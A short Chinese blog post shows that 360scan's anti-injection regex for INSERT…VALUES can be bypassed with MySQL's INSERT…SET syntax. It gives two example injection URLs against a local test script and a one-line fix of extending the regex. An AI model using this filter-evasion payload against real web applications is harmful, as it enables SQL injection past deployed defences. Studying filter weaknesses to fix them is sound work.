Mysql语法绕过360scan insert防注入 – 网站安全 – 自学

2020-10-10 分类：黑客攻防阅读(210) 评论(0) 扫描二维码

360scan正则：INSERT\\s+INTO.+?VALUES

其实Mysql不只可以用insert into xxx values 插入数据，还可以:insert into xxx set xx =

提交：

1	`http://localhost/360.php?sql=` `insert` `into` `user` `(` `user` `,pass)` `values` `(` `'admin'` `,` `'123456'` `)`

提交set语法：

1	`http://localhost/360.php?sql=` `insert` `into` `user` `set` `user` `=` `'admin'` `,pass=` `'123456'`

修复方法当然最好是加上set了。

0 个人已赞

赞一个收藏 (0)

未经允许不得转载：起风网 » Mysql语法绕过360scan insert防注入 – 网站安全 – 自学

标签：黑客技术学习黑客攻防

825e5b70b68d744d

相关推荐

评论抢沙发

评论前必须登录！